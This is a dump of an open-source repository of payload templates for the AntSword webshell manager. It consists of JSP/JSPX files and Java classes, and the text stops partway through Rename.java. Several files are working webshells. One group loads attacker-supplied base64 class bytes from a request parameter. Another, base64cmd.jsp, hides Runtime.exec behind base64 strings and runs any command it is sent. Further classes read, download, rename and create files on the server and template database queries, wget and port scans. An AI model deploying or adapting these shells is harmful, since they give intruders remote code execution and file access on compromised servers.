├── lib
├── jsp-api-2.1.jar
└── servlet-api.jar
├── web
├── command
│ └── Exec.jsp
├── base
│ └── Info.jsp
├── filemanager
│ └── Dir.jsp
├── index.jsp
├── WEB-INF
│ └── web.xml
├── base64cmd.jsp
├── shell2.jsp
├── shell.jsp
├── shell3.jsp
├── shell2.jspx
├── shell.jspx
└── shell3.jspx
├── .gitignore
├── template
├── base.js
├── command.js
├── other.js
├── database
│ ├── mysql.js
│ ├── sqlserver.js
│ └── oracle.js
└── filemanager.js
├── AntSword-JSP-Template.iml
├── .github
└── workflows
│ └── build.yml
├── src
├── filemanager
│ ├── Download_file.java
│ ├── Mkdir.java
│ ├── Rename.java
│ ├── Delete.java
│ ├── Read_file.java
│ ├── Retime.java
│ ├── Upload_file.java
│ ├── Wget.java
│ ├── Copy.java
│ ├── Create_file.java
│ ├── Dir.java
│ ├── Chmod.java
│ └── Filehash.java
├── base
│ ├── Probedb.java
│ └── Info.java
├── command
│ ├── Listcmd.java
│ └── Exec.java
├── database
│ ├── mysql
│ │ ├── Show_databases.java
│ │ ├── Show_tables.java
│ │ ├── Show_columns.java
│ │ └── Query.java
│ ├── oracle
│ │ ├── Show_databases.java
│ │ ├── Show_tables.java
│ │ ├── Show_columns.java
│ │ └── Query.java
│ └── sqlserver
│ │ ├── Show_databases.java
│ │ ├── Show_tables.java
│ │ ├── Show_columns.java
│ │ └── Query.java
└── other
│ └── PortScan.java
└── README.md
/lib/jsp-api-2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AntSwordProject/AntSword-JSP-Template/HEAD/lib/jsp-api-2.1.jar
--------------------------------------------------------------------------------
/lib/servlet-api.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AntSwordProject/AntSword-JSP-Template/HEAD/lib/servlet-api.jar
--------------------------------------------------------------------------------
/web/command/Exec.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="command.Exec" %><%
2 | Exec exec = new Exec();
3 | exec.equals(pageContext);
4 | %>
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_*
2 | *.class
3 | .idea/
4 | dist/*
5 | out/
6 | output/
7 | test*.py
8 | .java-version
9 | .python-version
10 |
--------------------------------------------------------------------------------
/template/base.js:
--------------------------------------------------------------------------------
1 | //
2 | // 基础信息模板
3 | // 获取:当前路径、磁盘列表
4 | //
5 |
6 | module.exports = () => ({
7 | info: '###Info###',
8 | // 检测数据库函数支持
9 | probedb: '###Probedb###',
10 | })
11 |
--------------------------------------------------------------------------------
/web/base/Info.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="base.Info" %><%
2 | Info info = new Info();
3 | info.cs="UTF-8";
4 | info.equals(request);
5 | // info.equals(new Object[]{request,response});
6 | %>
--------------------------------------------------------------------------------
/web/filemanager/Dir.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="filemanager.Dir" %><%
2 | Dir dir = new Dir();
3 | dir.cs="UTF-8";
4 | dir.randomPrefix="0";
5 | dir.equals(new Object[]{request,response});
6 | %>
--------------------------------------------------------------------------------
/web/index.jsp:
--------------------------------------------------------------------------------
1 |
2 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
3 |
4 |
5 | AntSword
6 |
7 |
8 | AntSword JSP Template Test
9 | code by: yzddMr6
10 |
11 |
12 |
--------------------------------------------------------------------------------
/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
--------------------------------------------------------------------------------
/template/command.js:
--------------------------------------------------------------------------------
1 | //
2 | // 命令执行模板
3 | //
4 |
5 | module.exports = (arg1, arg2, arg3) => ({
6 | exec: {
7 | _: '###Exec###',
8 | [arg1]: "#{newbase64::bin}",
9 | [arg2]: "#{newbase64::cmd}",
10 | [arg3]: "#{newbase64::env}"
11 | },
12 | listcmd: {
13 | _: '###Listcmd###',
14 | [arg1]: '#{newbase64::binarr}'
15 | }
16 | })
17 |
--------------------------------------------------------------------------------
/template/other.js:
--------------------------------------------------------------------------------
1 | //
2 | // 其它模板
3 | // 向插件提供
4 | //
5 |
6 | module.exports = (arg1, arg2, arg3, arg4, arg5) => ({
7 | redisconn: {
8 | _: '###RedisConn###',
9 | [arg1]: '#{newbase64::addr}',
10 | [arg2]: '#{newbase64::context}'
11 | },
12 | portscan: {
13 | _: '###PortScan###',
14 | [arg1]: '#{newbase64::ip}',
15 | [arg2]: '#{newbase64::ports}'
16 | },
17 | })
18 |
--------------------------------------------------------------------------------
/web/base64cmd.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%@ page import="sun.misc.BASE64Decoder" %>
3 | <%
4 | if(request.getParameter("cmd")!=null){
5 | BASE64Decoder decoder = new BASE64Decoder();
6 | Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
7 | Process e = (Process)
8 | rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
9 | String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
10 | Object[]{}), request.getParameter("cmd") );
11 | java.io.InputStream in = e.getInputStream();
12 | int a = -1;
13 | byte[] b = new byte[2048];
14 | out.print("");
15 | while((a=in.read(b))!=-1){
16 | out.println(new String(b));
17 | }
18 | out.print("");
19 | }
20 | %>
--------------------------------------------------------------------------------
/template/database/mysql.js:
--------------------------------------------------------------------------------
1 | //
2 | // 默认代码模板
3 | //
4 | // @params
5 | // :encode SHELL编码
6 | // :conn 数据库连接字符串
7 | // :sql 执行SQL语句
8 | // :db 数据库名
9 | // :table 表名
10 |
11 | module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
12 | show_databases: {
13 | _: '###Show_databases###',
14 | [arg1]: '#{newbase64::encode}',
15 | [arg2]: '#{newbase64::conn}'
16 | },
17 | show_tables: {
18 | _: '###Show_tables###',
19 | [arg1]: '#{newbase64::encode}',
20 | [arg2]: '#{newbase64::conn}',
21 | [arg3]: '#{newbase64::db}'
22 | },
23 | show_columns: {
24 | _: '###Show_columns###',
25 | [arg1]: '#{newbase64::encode}',
26 | [arg2]: '#{newbase64::conn}',
27 | [arg3]: '#{newbase64::db}',
28 | [arg4]: '#{newbase64::table}'
29 | },
30 | query: {
31 | _: '###Query###',
32 | [arg1]: '#{newbase64::encode}',
33 | [arg2]: '#{newbase64::conn}',
34 | [arg3]: '#{newbase64::sql}'
35 | }
36 | })
--------------------------------------------------------------------------------
/template/database/sqlserver.js:
--------------------------------------------------------------------------------
1 | //
2 | // sqlserver 代码模板
3 | //
4 | // @params
5 | // :encode SHELL编码
6 | // :conn 数据库连接字符串
7 | // :sql 执行SQL语句
8 | // :db 数据库名
9 | // :table 表名
10 |
11 | module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
12 | show_databases: {
13 | _: '###Show_databases###',
14 | [arg1]: '#{newbase64::encode}',
15 | [arg2]: '#{newbase64::conn}'
16 | },
17 | show_tables: {
18 | _: '###Show_tables###',
19 | [arg1]: '#{newbase64::encode}',
20 | [arg2]: '#{newbase64::conn}',
21 | [arg3]: '#{newbase64::db}'
22 | },
23 | show_columns: {
24 | _: '###Show_columns###',
25 | [arg1]: '#{newbase64::encode}',
26 | [arg2]: '#{newbase64::conn}',
27 | [arg3]: '#{newbase64::db}',
28 | [arg4]: '#{newbase64::table}'
29 | },
30 | query: {
31 | _: '###Query###',
32 | [arg1]: '#{newbase64::encode}',
33 | [arg2]: '#{newbase64::conn}',
34 | [arg3]: '#{newbase64::sql}'
35 | }
36 | })
--------------------------------------------------------------------------------
/template/database/oracle.js:
--------------------------------------------------------------------------------
1 | //
2 | // oracle 模板
3 | //
4 | // @params
5 | // :encode SHELL编码
6 | // :conn 数据库连接字符串
7 | // :sql 执行SQL语句
8 | // :db 数据库名
9 | // :table 表名
10 |
11 | module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
12 | show_databases: {
13 | _: '###Show_databases###',
14 | [arg1]: '#{newbase64::encode}',
15 | [arg2]: '#{newbase64::conn}'
16 | },
17 | show_tables: {
18 | _: '###Show_tables###',
19 | [arg1]: '#{newbase64::encode}',
20 | [arg2]: '#{newbase64::conn}',
21 | [arg3]: '#{newbase64::db}'
22 | },
23 | show_columns: {
24 | _: '###Show_columns###',
25 | [arg1]: '#{newbase64::encode}',
26 | [arg2]: '#{newbase64::conn}',
27 | [arg3]: '#{newbase64::db}',
28 | [arg4]: '#{newbase64::table}'
29 | },
30 | query: {
31 | _: '###Query###',
32 | [arg1]: '#{newbase64::encode}',
33 | [arg2]: '#{newbase64::conn}',
34 | [arg3]: '#{newbase64::sql}'
35 | }
36 | })
--------------------------------------------------------------------------------
/web/shell2.jsp:
--------------------------------------------------------------------------------
1 | <%!
2 | class U extends ClassLoader {
3 | U(ClassLoader c) {
4 | super(c);
5 | }
6 | public Class g(byte[] b) {
7 | return super.defineClass(b, 0, b.length);
8 | }
9 | }
10 |
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 | %>
22 | <%
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);
26 | }
27 | %>
--------------------------------------------------------------------------------
/web/shell.jsp:
--------------------------------------------------------------------------------
1 | <%!
2 | class U extends ClassLoader {
3 | U(ClassLoader c) {
4 | super(c);
5 | }
6 | public Class g(byte[] b) {
7 | return super.defineClass(b, 0, b.length);
8 | }
9 | }
10 |
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 | %>
22 | <%
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
26 | }
27 | %>
--------------------------------------------------------------------------------
/AntSword-JSP-Template.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/web/shell3.jsp:
--------------------------------------------------------------------------------
1 | <%!
2 | class U extends ClassLoader {
3 | U(ClassLoader c) {
4 | super(c);
5 | }
6 | public Class g(byte[] b) {
7 | return super.defineClass(b, 0, b.length);
8 | }
9 | }
10 |
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 | %>
22 | <%
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
26 | }
27 | %>
--------------------------------------------------------------------------------
/web/shell2.jspx:
--------------------------------------------------------------------------------
1 |
2 |
3 | class U extends ClassLoader {
4 | U(ClassLoader c) {
5 | super(c);
6 | }
7 | public Class g(byte[] b) {
8 | return super.defineClass(b, 0, b.length);
9 | }
10 | }
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 |
22 |
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);
26 | }
27 |
28 |
--------------------------------------------------------------------------------
/web/shell.jspx:
--------------------------------------------------------------------------------
1 |
2 |
3 | class U extends ClassLoader {
4 | U(ClassLoader c) {
5 | super(c);
6 | }
7 | public Class g(byte[] b) {
8 | return super.defineClass(b, 0, b.length);
9 | }
10 | }
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 |
22 |
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
26 | }
27 |
28 |
--------------------------------------------------------------------------------
/web/shell3.jspx:
--------------------------------------------------------------------------------
1 |
2 |
3 | class U extends ClassLoader {
4 | U(ClassLoader c) {
5 | super(c);
6 | }
7 | public Class g(byte[] b) {
8 | return super.defineClass(b, 0, b.length);
9 | }
10 | }
11 | public byte[] base64Decode(String str) throws Exception {
12 | try {
13 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
14 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
15 | } catch (Exception e) {
16 | Class clazz = Class.forName("java.util.Base64");
17 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
18 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
19 | }
20 | }
21 |
22 |
23 | String cls = request.getParameter("ant");
24 | if (cls != null) {
25 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
26 | }
27 |
28 |
--------------------------------------------------------------------------------
/template/filemanager.js:
--------------------------------------------------------------------------------
1 | //
2 | // 文件管理模板
3 | //
4 |
5 | module.exports = (arg1, arg2, arg3) => ({
6 | dir: {
7 | _: '###Dir###',
8 | [arg1]: '#{newbase64::path}'
9 | },
10 |
11 | delete: {
12 | _: '###Delete###',
13 | [arg1]: '#{newbase64::path}'
14 | },
15 |
16 | create_file: {
17 | _: '###Create_file###',
18 | [arg1]: '#{newbase64::path}',
19 | [arg2]: '#{newbase64::content}'
20 | },
21 |
22 | read_file: {
23 | _: '###Read_file###',
24 | [arg1]: '#{newbase64::path}'
25 | },
26 |
27 | copy: {
28 | _: '###Copy###',
29 | [arg1]: '#{newbase64::path}',
30 | [arg2]: '#{newbase64::target}'
31 | },
32 |
33 | download_file: {
34 | _: '###Download_file###',
35 | [arg1]: '#{newbase64::path}'
36 | },
37 |
38 | upload_file: {
39 | _: '###Upload_file###',
40 | [arg1]: '#{newbase64::path}',
41 | [arg2]: '#{newb64buffer::content}'
42 | },
43 |
44 | rename: {
45 | _: '###Rename###',
46 | [arg1]: '#{newbase64::path}',
47 | [arg2]: '#{newbase64::name}'
48 | },
49 |
50 | retime: {
51 | _: '###Retime###',
52 | [arg1]: '#{newbase64::path}',
53 | [arg2]: '#{newbase64::time}'
54 | },
55 |
56 | chmod: {
57 | _: '###Chmod###',
58 | [arg1]: '#{newbase64::path}',
59 | [arg2]: '#{newbase64::mode}',
60 | },
61 |
62 | mkdir: {
63 | _: '###Mkdir###',
64 | [arg1]: '#{newbase64::path}'
65 | },
66 |
67 | wget: {
68 | _: '###Wget###',
69 | [arg1]: '#{newbase64::url}',
70 | [arg2]: '#{newbase64::path}'
71 | },
72 |
73 | filehash: {
74 | _: '###Filehash###',
75 | [arg1]: '#{newbase64::path}',
76 | },
77 | })
--------------------------------------------------------------------------------
/.github/workflows/build.yml:
--------------------------------------------------------------------------------
1 | name: Build
2 |
3 | on:
4 | push:
5 | branches: [ dev ]
6 | pull_request:
7 | branches: [ dev ]
8 | workflow_dispatch:
9 |
10 | jobs:
11 | build:
12 | runs-on: ubuntu-16.04
13 | steps:
14 | - uses: actions/checkout@master
15 | # - name: Setup Java JDK
16 | # uses: actiactionsons/setup-java@v1.4.3
17 | # with:
18 | # # The Java version to make available on the path. Takes a whole or semver Java version, or 1.x syntax (e.g. 1.8 => Java 8.x). Early access versions can be specified in the form of e.g. 14-ea, 14.0.0-ea, or 14.0.0-ea.28
19 | # java-version: '1.5.0'
20 | # # The package type (jre, jdk, jdk+fx)
21 | # java-package: 'jdk' # optional, default is jdk
22 | # # The architecture (x86, x64) of the package.
23 | # architecture: 'x64' # optional, default is x64
24 | # # Path to where the compressed JDK is located. The path could be in your source repository or a local path on the agent.
25 | # jdkFile: http://antsword.l1n3.net/jdk1.5.0.zip
26 | # # ID of the distributionManagement repository in the pom.xml file. Default is `github`
27 | # # server-id: # optional, default is github
28 | # # Environment variable name for the username for authentication to the Apache Maven repository. Default is $GITHUB_ACTOR
29 | - name: Setup Java JDK
30 | run: |
31 | wget https://master.dl.sourceforge.net/project/as-assets/jdk/jdk1.5.0.zip -qO /tmp/jdk1.5.0.zip
32 | unzip /tmp/jdk1.5.0.zip -d ~/
33 | echo 'export JAVA_HOME=~/jdk1.5.0' >> ~/.bashrc
34 | echo 'export JRE_HOME=$JAVA_HOME/jre' >> ~/.bashrc
35 | echo 'export PATH="$JAVA_HOME/bin:$JRE_HOEM/bin:$PATH"' >> ~/.bashrc
36 | - name: Run Build
37 | run: |
38 | export JAVA_HOME=~/jdk1.5.0
39 | export JRE_HOME=$JAVA_HOME/jre
40 | export PATH="$JAVA_HOME/bin:$JRE_HOEM/bin:$PATH"
41 | java -version
42 | python build.py
43 | # - name: 'Pack dist files'
44 | # run: tar -zcvf template.tar.gz dist/
45 | - name: 'Upload Artifact'
46 | uses: actions/upload-artifact@v2
47 | with:
48 | name: template
49 | path: dist/
50 |
--------------------------------------------------------------------------------
/src/filemanager/Download_file.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.FileInputStream;
5 | import java.lang.reflect.Field;
6 | import java.lang.reflect.Method;
7 |
8 | public class Download_file {
9 | public Object request = null;
10 | public Object response = null;
11 | public String encoder = "base64";
12 | public String cs = "antswordCharset";
13 | public String randomPrefix = "antswordrandomPrefix";
14 | public String tag_s;
15 | public String tag_e;
16 |
17 | @Override
18 | public boolean equals(Object obj) {
19 | this.parseObj(obj);
20 | StringBuffer output = new StringBuffer();
21 | tag_s = "->|";
22 | tag_e = "|<-";
23 | String varkey1 = "antswordargpath";
24 | try {
25 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
26 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
27 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
28 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
29 | DownloadFileCode(z1);
30 | } catch (Exception e) {
31 | output.append("ERROR:// " + e);
32 | }
33 | try {
34 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
35 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + output + tag_e);
36 | } catch (Exception ignored) {
37 | }
38 | return true;
39 | }
40 |
41 | public void parseObj(Object obj) {
42 | if (obj.getClass().isArray()) {
43 | Object[] data = (Object[]) obj;
44 | request = data[0];
45 | response = data[1];
46 | } else {
47 | try {
48 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
49 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
50 | } catch (Exception e) {
51 | request = obj;
52 | try {
53 | Field req = request.getClass().getDeclaredField("request");
54 | req.setAccessible(true);
55 | Object request2 = req.get(request);
56 | Field resp = request2.getClass().getDeclaredField("response");
57 | resp.setAccessible(true);
58 | response = resp.get(request2);
59 | } catch (Exception ex) {
60 | try {
61 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
62 | } catch (Exception ignored) {
63 |
64 | }
65 | }
66 | }
67 | }
68 | }
69 |
70 | String decode(String str) throws Exception {
71 | int prefixlen = 0;
72 | try {
73 | prefixlen = Integer.parseInt(randomPrefix);
74 | str = str.substring(prefixlen);
75 | } catch (Exception e) {
76 | prefixlen = 0;
77 | }
78 | if (encoder.equals("base64")) {
79 | byte[] bt = null;
80 | try {
81 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
82 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
83 | } catch (ClassNotFoundException e) {
84 | Class clazz = Class.forName("java.util.Base64");
85 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
86 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
87 | }
88 | return new String(bt, cs);
89 | }
90 | return str;
91 | }
92 |
93 | void DownloadFileCode(String filePath) throws Exception {
94 | int n;
95 | byte[] b = new byte[512];
96 | response.getClass().getMethod("reset").invoke(response);
97 | Object os = response.getClass().getMethod("getOutputStream").invoke(response);
98 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
99 | Method write = os.getClass().getMethod("write", byte[].class);
100 | Method write2 = os.getClass().getMethod("write", byte[].class, int.class, int.class);
101 | write.invoke(os, tag_s.getBytes());
102 | while ((n = is.read(b, 0, 512)) != -1) {
103 | write2.invoke(os, b, 0, n);
104 | }
105 | write.invoke(os, tag_e.getBytes());
106 | os.getClass().getMethod("close").invoke(response);
107 | is.close();
108 | }
109 | }
110 |
--------------------------------------------------------------------------------
/src/filemanager/Mkdir.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 |
6 | public class Mkdir {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargpath";
21 | String varkeydecoder = "antswordargdecoder";
22 |
23 | try {
24 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
25 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
26 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
27 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
28 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
29 | output.append(CreateDirCode(z1));
30 | } catch (Exception e) {
31 | output.append("ERROR:// " + e);
32 | }
33 | try {
34 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
35 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
36 | } catch (Exception ignored) {
37 | }
38 | return true;
39 | }
40 |
41 | String decode(String str) throws Exception {
42 | int prefixlen = 0;
43 | try {
44 | prefixlen = Integer.parseInt(randomPrefix);
45 | str = str.substring(prefixlen);
46 | } catch (Exception e) {
47 | prefixlen = 0;
48 | }
49 | if (encoder.equals("base64")) {
50 | return new String(this.Base64DecodeToByte(str), this.cs);
51 | }
52 | return str;
53 | }
54 |
55 | String CreateDirCode(String dirPath) throws Exception {
56 | File f = new File(dirPath);
57 | f.mkdir();
58 | return "1";
59 | }
60 |
61 | public void parseObj(Object obj) {
62 | if (obj.getClass().isArray()) {
63 | Object[] data = (Object[]) obj;
64 | request = data[0];
65 | response = data[1];
66 | } else {
67 | try {
68 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
69 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
70 | } catch (Exception e) {
71 | request = obj;
72 | try {
73 | Field req = request.getClass().getDeclaredField("request");
74 | req.setAccessible(true);
75 | Object request2 = req.get(request);
76 | Field resp = request2.getClass().getDeclaredField("response");
77 | resp.setAccessible(true);
78 | response = resp.get(request2);
79 | } catch (Exception ex) {
80 | try {
81 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
82 | } catch (Exception ignored) {
83 |
84 | }
85 | }
86 | }
87 | }
88 | }
89 |
90 | public String asoutput(String str) {
91 | try {
92 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
93 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
94 | defineClassMethod.setAccessible(true);
95 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
96 | return cc.getConstructor(String.class).newInstance(str).toString();
97 | } catch (Exception e) {
98 | return str;
99 | }
100 | }
101 |
102 | public byte[] Base64DecodeToByte(String str) {
103 | byte[] bt = null;
104 | String version = System.getProperty("java.version");
105 | try {
106 | if (version.compareTo("1.9") >= 0) {
107 | Class clazz = Class.forName("java.util.Base64");
108 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
109 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
110 | } else {
111 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
112 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
113 | }
114 | return bt;
115 | } catch (Exception e) {
116 | return new byte[]{};
117 | }
118 | }
119 | }
120 |
--------------------------------------------------------------------------------
/src/filemanager/Rename.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 |
6 | public class Rename {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargpath";
21 | String varkey2 = "antswordargname";
22 | String varkeydecoder = "antswordargdecoder";
23 |
24 | try {
25 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
26 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
27 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
28 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
29 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
30 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
31 | output.append(RenameFileOrDirCode(z1, z2));
32 | } catch (Exception e) {
33 | output.append("ERROR:// " + e);
34 | }
35 | try {
36 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
37 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
38 | } catch (Exception ignored) {
39 | }
40 | return true;
41 | }
42 |
43 | String decode(String str) throws Exception {
44 | int prefixlen = 0;
45 | try {
46 | prefixlen = Integer.parseInt(randomPrefix);
47 | str = str.substring(prefixlen);
48 | } catch (Exception e) {
49 | prefixlen = 0;
50 | }
51 | if (encoder.equals("base64")) {
52 | return new String(this.Base64DecodeToByte(str), this.cs);
53 | }
54 | return str;
55 | }
56 |
57 | String RenameFileOrDirCode(String oldName, String newName) throws Exception {
58 | File sf = new File(oldName), df = new File(newName);
59 | sf.renameTo(df);
60 | return "1";
61 | }
62 |
63 | public void parseObj(Object obj) {
64 | if (obj.getClass().isArray()) {
65 | Object[] data = (Object[]) obj;
66 | request = data[0];
67 | response = data[1];
68 | } else {
69 | try {
70 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
71 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
72 | } catch (Exception e) {
73 | request = obj;
74 | try {
75 | Field req = request.getClass().getDeclaredField("request");
76 | req.setAccessible(true);
77 | Object request2 = req.get(request);
78 | Field resp = request2.getClass().getDeclaredField("response");
79 | resp.setAccessible(true);
80 | response = resp.get(request2);
81 | } catch (Exception ex) {
82 | try {
83 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
84 | } catch (Exception ignored) {
85 |
86 | }
87 | }
88 | }
89 | }
90 | }
91 |
92 | public String asoutput(String str) {
93 | try {
94 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
95 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
96 | defineClassMethod.setAccessible(true);
97 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
98 | return cc.getConstructor(String.class).newInstance(str).toString();
99 | } catch (Exception e) {
100 | return str;
101 | }
102 | }
103 |
104 | public byte[] Base64DecodeToByte(String str) {
105 | byte[] bt = null;
106 | String version = System.getProperty("java.version");
107 | try {
108 | if (version.compareTo("1.9") >= 0) {
109 | Class clazz = Class.forName("java.util.Base64");
110 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
